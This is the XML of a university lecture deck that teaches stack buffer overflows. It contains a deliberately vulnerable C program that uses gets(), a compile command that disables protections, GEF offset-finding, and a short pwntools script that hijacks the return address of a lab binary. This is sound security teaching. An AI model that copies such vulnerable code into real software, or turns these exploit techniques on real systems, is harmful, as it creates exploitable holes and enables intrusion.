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24956ea5d234d03" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/extended-properties" Target="docProps/app.xml"/><Relationship Id="R79d19e49a6444dda" Type="http://schemas.openxmlformats.org/package/2006/relationships/metadata/core-properties" Target="docProps/core.xml"/><Relationship Id="Rdca02fe77bd94a59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b8131a44b74bcb"/>
  </p:sldMasterIdLst>
  <p:notesMasterIdLst>
    <p:notesMasterId xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:id="Rb300a71c2fcd4c30"/>
  </p:notesMasterIdLst>
  <p:sldIdLst>
    <p:sldId xmlns:ns0="http://schemas.openxmlformats.org/officeDocument/2006/relationships" id="256" ns0:id="rId7"/>
    <p:sldId xmlns:ns0="http://schemas.openxmlformats.org/officeDocument/2006/relationships" id="257" ns0:id="rId8"/>
    <p:sldId xmlns:ns0="http://schemas.openxmlformats.org/officeDocument/2006/relationships" id="258" ns0:id="rId9"/>
    <p:sldId xmlns:ns0="http://schemas.openxmlformats.org/officeDocument/2006/relationships" id="259" ns0:id="rId10"/>
    <p:sldId xmlns:ns0="http://schemas.openxmlformats.org/officeDocument/2006/relationships" id="260" ns0:id="rId11"/>
    <p:sldId xmlns:ns0="http://schemas.openxmlformats.org/officeDocument/2006/relationships" id="261" ns0:id="rId12"/>
    <p:sldId xmlns:ns0="http://schemas.openxmlformats.org/officeDocument/2006/relationships" id="262" ns0:id="rId13"/>
    <p:sldId xmlns:ns0="http://schemas.openxmlformats.org/officeDocument/2006/relationships" id="263" ns0:id="rId14"/>
    <p:sldId xmlns:ns0="http://schemas.openxmlformats.org/officeDocument/2006/relationships" id="264" ns0:id="rId15"/>
    <p:sldId xmlns:ns0="http://schemas.openxmlformats.org/officeDocument/2006/relationships" id="265" ns0:id="rId16"/>
    <p:sldId xmlns:ns0="http://schemas.openxmlformats.org/officeDocument/2006/relationships" id="266" ns0:id="rId17"/>
    <p:sldId xmlns:ns0="http://schemas.openxmlformats.org/officeDocument/2006/relationships" id="267" ns0:id="rId18"/>
    <p:sldId xmlns:ns0="http://schemas.openxmlformats.org/officeDocument/2006/relationships" id="268" ns0:id="rId19"/>
    <p:sldId xmlns:ns0="http://schemas.openxmlformats.org/officeDocument/2006/relationships" id="269" ns0:id="rId20"/>
    <p:sldId xmlns:ns0="http://schemas.openxmlformats.org/officeDocument/2006/relationships" id="270" ns0:id="rId21"/>
    <p:sldId xmlns:ns0="http://schemas.openxmlformats.org/officeDocument/2006/relationships" id="271" ns0:id="rId22"/>
    <p:sldId xmlns:ns0="http://schemas.openxmlformats.org/officeDocument/2006/relationships" id="272" ns0:id="rId23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931b91f2aed48dd" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="theme/theme1.xml"/><Relationship Id="R27b8131a44b74bcb" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster1.xml"/><Relationship Id="R66dc9ec30dc34184" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/viewProps" Target="viewProps.xml"/><Relationship Id="R7752031efbc64484" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/presProps" Target="presProps.xml"/><Relationship Id="Ra553c2f116224f3b" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tableStyles" Target="tableStyles.xml"/><Relationship Id="Rb300a71c2fcd4c30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c038b810ef6e484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Sequence and examples adapted from the instructor's prior Software Security course, Chapter 7. Lab 2 (Stack Overflow) and Quiz 2 both draw on this class. Classroom files: wcu.ninja/files/CSC472_Week05_code.tar.gz.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p2-3 framing (‘memory corruption’). Today = steps 1-2 of the 3-step bug→vulnerability model (ch08 p41-43): find the bug, hijack control flow. Step 3 (payload) is Class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p2-4 (definition, buffer definition, C array picture).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p5-6 ('a novice/another C programmer mistake').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p10 (overflow.c source, hacked()+return_input()/gets). Reused nearly verbatim — int main(void) added for a clean modern compile.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p9 (stack diagram) + p13 (Return Hijack frame). Offsets are teaching approximations — confirm your own with `disas return_input` in Lab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p11 (Protection: ASLR, DEP, Stack Protector). NX/ASLR mechanics are explicitly deferred to Week 6 per the Fall 2026 syllabus — keep this slide light.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p13-14/19-21 (Return Hijack + From Crash to Hack AAAA/BBBB/CCCC/DDDD diagram), redrawn as a byte table instead of a screenshot.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p22 + ch08 p10-12 (De Bruijn sequence explanation, more detailed walkthrough in ch08). We use GEF's pattern plugin; ss2024 used PEDA — same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Transcript style matches Class06/07's GEF demos rather than ss2024's PEDA screenshots (ch07 p22-23, ch08 p12-13) — same workflow, current tooling.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p12-14/19-20 ('Return Hijack', 'From Crash to Hack → Hacked()'). This is exactly Lab 2's Part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p14-15 (echo/printf/python one-liners building the AAAA...address string) — folded into the frame diagram and the next slide's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p30-31 ('Update Python Script') showed the full shellcode version; this is the simpler hijack-only version for Class 8 / Lab 2 Part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Live-demo slide in the Class06/07 style. Use the section's own binary; addresses shown earlier are illustrative, not this build's real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New slide, no direct ss2024 source — added because this is exactly where students get stuck in Lab 2, per Lab 1's grading-notes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p37 ('Classic Exploitation Technique': 1. call hacked() (lab1) 2. write our own shellcode (lab2)') — maps directly onto our Class 8/9 split.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Mirrors Class07 slide21's references layout. ss2024 source: ch07 (full) + ch08 p1-13 (review + detailed offset-finding walkthrough).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22776b0cc75e4829" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2.jpeg"/><Relationship Id="R38b6ce4b89ef40c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c847c2955614f89" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image3.jpeg"/><Relationship Id="Rd507bf037ef24bd2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21db076516244742" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image3.jpeg"/><Relationship Id="R5dd3858852804ee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4ed5a8e400d04e10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2e042b3e947f428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188e5766500a4d40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d224c154301942cd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34b671f00b35416d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8276271825d641a5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c20543eda370463a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9ea43659318f440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showMasterSp="0" type="title" preserve="1">
  <p:cSld name="标题幻灯片">
    <p:bg>
      <p:bgPr>
        <a:blipFill xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" rotWithShape="0">
          <a:blip xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:embed="R22776b0cc75e4829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47c2955614f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48700" y="6065721"/>
            <a:ext cx="495300" cy="80962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b0765162447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48700" y="6065721"/>
            <a:ext cx="495300" cy="80962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9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0.xml><?xml version="1.0" encoding="utf-8"?>
<p:sldLayout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1.xml><?xml version="1.0" encoding="utf-8"?>
<p:sldLayout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9d22cbabc434f27" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout3.xml"/><Relationship Id="R1b00ab6e8a4c4254" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout6.xml"/><Relationship Id="R3e47e2d7986f4bff" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="theme/theme2.xml"/><Relationship Id="R43bf1cbbaf5f4f79" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout4.xml"/><Relationship Id="R465046500aa74df6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout9.xml"/><Relationship Id="R63b2f1703b2c4cad" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout11.xml"/><Relationship Id="Ra99b01b456ce4dd4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout8.xml"/><Relationship Id="Rae7d864d5fcb42ab" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1.xml"/><Relationship Id="Raf1946e829e9496d" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout5.xml"/><Relationship Id="Rd00a49c570184981" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout10.xml"/><Relationship Id="Rda875a7d83e74055" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout7.xml"/><Relationship Id="Re72ad7413aa44fdf" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image.jpeg"/><Relationship Id="Rfc51e07cc33f4f0a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>
    <p:bg>
      <p:bgPr>
        <a:blipFill xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" rotWithShape="0">
          <a:blip xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:embed="Re72ad7413aa44fdf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7d864d5fcb42ab"/>
    <p:sldLayoutId xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" id="2147483650" r:id="Rfc51e07cc33f4f0a"/>
    <p:sldLayoutId xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" id="2147483651" r:id="R09d22cbabc434f27"/>
    <p:sldLayoutId xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" id="2147483652" r:id="R43bf1cbbaf5f4f79"/>
    <p:sldLayoutId xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" id="2147483653" r:id="Raf1946e829e9496d"/>
    <p:sldLayoutId xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" id="2147483654" r:id="R1b00ab6e8a4c4254"/>
    <p:sldLayoutId xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" id="2147483655" r:id="Rda875a7d83e74055"/>
    <p:sldLayoutId xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" id="2147483656" r:id="Ra99b01b456ce4dd4"/>
    <p:sldLayoutId xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" id="2147483657" r:id="R465046500aa74df6"/>
    <p:sldLayoutId xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" id="2147483658" r:id="Rd00a49c570184981"/>
    <p:sldLayoutId xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" id="2147483659" r:id="R63b2f1703b2c4cad"/>
  </p:sldLayoutIdLst>
  <p:txStyles>
    <p:titleStyle>
      <a:lvl1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+mj-lt"/>
          <a:ea typeface="+mj-lt"/>
          <a:cs typeface="+mj-lt"/>
        </a:defRPr>
      </a:lvl1pPr>
      <a:lvl2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2pPr>
      <a:lvl3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3pPr>
      <a:lvl4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4pPr>
      <a:lvl5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5pPr>
      <a:lvl6pPr xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" marL="4572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6pPr>
      <a:lvl7pPr xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" marL="9144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7pPr>
      <a:lvl8pPr xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" marL="13716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8pPr>
      <a:lvl9pPr xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" marL="18288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L="180975" indent="-180975" algn="l">
        <a:spcBef>
          <a:spcPct val="0"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="40000"/>
        </a:spcAft>
        <a:buFont typeface="Wingdings"/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44500" indent="-261938" algn="l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720725" indent="-274638" algn="l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987425" indent="-265113" algn="l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2541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7113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1685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6257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0829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509" y="3823844"/>
            <a:ext cx="3164491" cy="2106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00" y="200025"/>
            <a:ext cx="1600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625" b="1" i="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>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685800"/>
            <a:ext cx="16002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6450" b="1" i="0">
                <a:solidFill>
                  <a:srgbClr val="247793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450" y="1514475"/>
            <a:ext cx="8039100" cy="590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3450" b="1" i="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>CSC 472 Software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450" y="2257425"/>
            <a:ext cx="8039100" cy="53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925" b="1" i="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Stack Overflow: Crash to Hijack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2450" y="2895600"/>
            <a:ext cx="8039100" cy="4476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175" b="1" i="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Dr. Si Chen (schen@wcupa.edu)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2450" y="6000750"/>
            <a:ext cx="8039100" cy="6762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Tue / Thu · 2:00–3:15 PM · 25 University Ave., Room 158</a:t>
            </a:r>
          </a:p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Fall 2026 · Week 5 · Tuesday, September 22, 2026</a:t>
            </a:r>
          </a:p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WolfCTF + GDB / GEF · wcu.ninja/csc472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From a crash to a hijacked program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2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Recall the frame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Buffer, saved base pointer, and return address all live on the stack (Class 4–5).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Break the array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Write more bytes than the buffer holds and watch the return address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Find the exact offset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Use a cyclic pattern so we know precisely which bytes land in EIP.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4619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Redirect execution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5000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Point the return address at a function that already exists in the binary.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Memory corruption, in one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3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What is memory corruption?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Modifying a process's own memory in a way the programmer never intended. It is the umbrella term for almost everything the rest of this course covers.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buffers are the usual entry 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A buffer is a fixed-size, contiguous block of memory — in C, most often an array. C performs no bounds checking: nothing stops code from reading or writing past the end.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it matters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 large majority of real-world and competition system-level exploits start from some form of memory corruption — stack overflow is the simplest case to learn it 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The unsafe pattern: no bounds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4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4100000" cy="260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41000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36809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a_novice_mistake.c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3680900" cy="166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int array[5];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printf("%d\n", array[20]);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// C happily reads whatever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// bytes live 20 ints past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// the end of array.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0000" y="1200000"/>
            <a:ext cx="3971925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No built-in protection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0000" y="1581000"/>
            <a:ext cx="3971925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C never checks that an index or a write stays inside the buffer. Reading past the end is undefined behavior; writing past the end is how we corrupt memory on purpose.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Meet overflow.c — today's target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5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4600000" cy="530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46000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41809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overflow.c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4180900" cy="436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#include &lt;stdio.h&gt;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#include &lt;string.h&gt;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void hacked()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puts("Hacked by Si Chen!!!!");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void return_input(void)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char array[30];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gets(array);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printf("%s\n", array);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int main(void)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return_input();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return 0;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0000" y="115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Two things to notice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0000" y="153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gets() has no length limit. hacked() sits in the binary</a:t>
            </a:r>
          </a:p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but is never called — today we call it anyway.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0000" y="305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This is Lab 2's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0000" y="343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Compiled with gcc -m32 -fno-stack-protector</a:t>
            </a:r>
          </a:p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-z execstack -no-pie — the same target you</a:t>
            </a:r>
          </a:p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will attack yourself in Lab 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Stack frame recap: where the return address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6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0000" y="1150000"/>
            <a:ext cx="1213800" cy="6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EBP−0x1e</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Rectangle 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2490000" y="1150000"/>
            <a:ext cx="3010000" cy="66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array[30]  (attacker-controlled)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0000" y="1810000"/>
            <a:ext cx="1213800" cy="6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EBP−0x04</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Rectangle 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2490000" y="1810000"/>
            <a:ext cx="3010000" cy="66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… (compiler padding)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0000" y="2470000"/>
            <a:ext cx="1213800" cy="6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EBP+0x00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90000" y="2470000"/>
            <a:ext cx="3010000" cy="660000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="F5D77A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Saved EBP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000" y="3130000"/>
            <a:ext cx="1213800" cy="6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EBP+0x04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90000" y="3130000"/>
            <a:ext cx="3010000" cy="660000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="B02A2A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Return Address (EIP)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0000" y="3790000"/>
            <a:ext cx="1213800" cy="6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EBP+0x08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90000" y="3790000"/>
            <a:ext cx="3010000" cy="66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argc / caller's frame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0000" y="1300000"/>
            <a:ext cx="28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Low → high address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0000" y="1681000"/>
            <a:ext cx="28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array grows toward higher addresses. Write past its end and the very next bytes you overwrite are the saved EBP, then the return address itself.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Turning off the safety nets — for this lesson only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7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8305800" cy="16002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compile command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7886700" cy="666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50" b="0" i="0">
                <a:solidFill>
                  <a:srgbClr val="E6F4EF"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>gcc -m32 -fno-stack-protector -z execstack -no-pie -o overflow overflow.c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29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disable protections to learn this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2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-fno-stack-protector removes the stack canary, -z execstack removes NX/DEP, and -no-pie removes ASLR's base-address randomization. Real binaries ship with all three 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4043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Coming next week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4424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Week 6 turns every one of these back on and shows exactly how each defense changes the attack. Today we isolate one idea at a time: overwrite the return address.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From crash to hijack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8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0000" y="115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EBP-0x1e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0000" y="115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0000" y="115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3500000" y="115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0000" y="115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000" y="157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EBP-0x1a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0000" y="157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40000" y="157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00000" y="157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60000" y="157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000" y="199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EBP-0x16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0000" y="199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40000" y="199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00000" y="199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60000" y="199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000" y="241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EBP-0x12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80000" y="241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0000" y="241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00000" y="241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60000" y="241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0000" y="283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EBP+0x00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80000" y="283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0000" y="283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00000" y="283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60000" y="283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11440" y="283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Saved EBP — overwritten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0000" y="325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EBP+0x04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80000" y="325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??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0000" y="325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??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00000" y="325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??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260000" y="325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??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11440" y="325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Return Address — overwritten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0000" y="4000000"/>
            <a:ext cx="7000000" cy="3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 i="1">
                <a:solidFill>
                  <a:srgbClr val="247793"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Send 30+ bytes of 'A' and the program crashes with EIP = 0x41414141 — you now control EIP.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Finding the exact offset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9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not just count bytes by hand?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'AAAA' everywhere makes it impossible to tell which 4 bytes landed in EIP. We need input where every 4-byte window is unique.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The cyclic pattern (De Bruijn sequence)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A cyclic pattern of length N has a unique 4-byte substring at every position. Whatever 4 bytes end up in EIP tell you exactly how far into the pattern you crashed.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One command, two directions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GEF: pattern create 100  — generates it.  pattern offset $eip  — looks the crash value up and prints the offset for you.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Offset in practice (GDB + GEF)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10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8305800" cy="4638675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gdb-peda$ → gef➤  session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7886700" cy="37052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gef➤  pattern create 100 pattern100.txt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gef➤  r &lt; pattern100.txt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Program received signal SIGSEGV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$eip   :   0x61616164 ("aaad...")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gef➤  pattern offset $eip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[+] Found at offset 30 (little-endian search)</a:t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600" b="0" i="0">
                <a:solidFill>
                  <a:srgbClr val="E6F4EF"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t># Verify: 30 bytes of padding, then EIP.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Redirecting execution: the return-hijack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11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We don't need new code yet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hacked() already exists in the binary, at a fixed address (no PIE this week). If we can control EIP, we can simply point it there instead of back into main().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5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The payload shape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8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30 bytes of padding (fills array + saved EBP) followed by 4 bytes: the address of hacked(), in little-endian byte order (recall Class 2).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8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Find the address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1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objdump -d overflow | grep '&lt;hacked&gt;:'  — or  p hacked  inside GDB/GEF.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Building the payload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12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0000" y="1300000"/>
            <a:ext cx="859800" cy="7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+0x00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6000" y="1300000"/>
            <a:ext cx="4264000" cy="70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padding — 30 bytes of 'A' (0x41)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0000" y="2000000"/>
            <a:ext cx="859800" cy="7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+0x1e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6000" y="2000000"/>
            <a:ext cx="4264000" cy="70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saved EBP — 4 more junk bytes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0000" y="2700000"/>
            <a:ext cx="859800" cy="7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+0x22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6000" y="2700000"/>
            <a:ext cx="4264000" cy="700000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="B02A2A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hacked() address, little-endian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0000" y="1450000"/>
            <a:ext cx="20000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Byte order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0000" y="1831000"/>
            <a:ext cx="20000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0x08049176 is written to memory as 76 91 04 08 — low byte first (Class 2).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Writing the exploit (pwntools)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13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8305800" cy="4638675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exploit_hijack.py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7886700" cy="37052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#!/usr/bin/env python3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from pwn import *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context.update(arch='i386', os='linux')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def main():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p = process('./overflow')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padding = b'A' * 30          # your offset from pattern offset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hacked_addr = 0x08049176     # your address from objdump/GDB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payload = padding + b'JUNK' + p32(hacked_addr)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p.sendline(payload)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p.interactive()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if __name__ == '__main__':</a:t>
            </a:r>
          </a:p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    main()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Live demo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14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1. Confirm the offset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gef➤  pattern create 100  →  r &lt; pattern100  →  pattern offset $eip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2. Find hacked()'s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objdump -d overflow | grep '&lt;hacked&gt;:'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3. Run the exploit and watch it print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python3 exploit_hijack.py  →  "Hacked by Si Chen!!!!" appears without main() ever calling hacked().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What could go wrong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15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Off-by-a-few padding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30 vs 34 bytes of padding: the extra saved-EBP bytes are easy to miscount. Trust pattern offset over hand-counting.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Wrong byte order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Writing the address big-endian silently sends EIP somewhere unmapped instead of hacked(). p32() gets this right for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A stale address after recompiling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Any edit to overflow.c can move hacked(). Re-check the address after every rebuild.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Recap — and what's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16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Today: return-hijack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Overflow a buffer, overwrite the return address, and land in code that already exists in the binary.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Thursday: return-to-shellcode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Same crash, same technique for finding the offset — but instead of jumping to existing code, we bring our own: the execve shellcode you built in Class 7.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Also this week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Quiz 2 covers Classes 6–9. Lab 2 (Stack Overflow) opens after Class 9 and uses both of this week's targets.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References and what comes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17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Original course materials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Course archive → Chapters 7–8: overflow.c and the return-hijack walkthrough.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1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Current technical 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4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gef.readthedocs.io (pattern plugin); docs.pwntools.com; Aleph One, “Smashing the Stack for Fun and Profit” (Phrack 49).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01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All files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39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wcu.ninja/csc472 → Class 8 slides and the Week 5 code bundle.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39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Next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43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Return-to-shellcode: what changes when we inject our own code instead of jumping to code that already exists?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2026-09-11T20:23:41.2560000Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-09-11T20:23:41.2560000Z</dcterms:modified>
</coreProperties>
</file>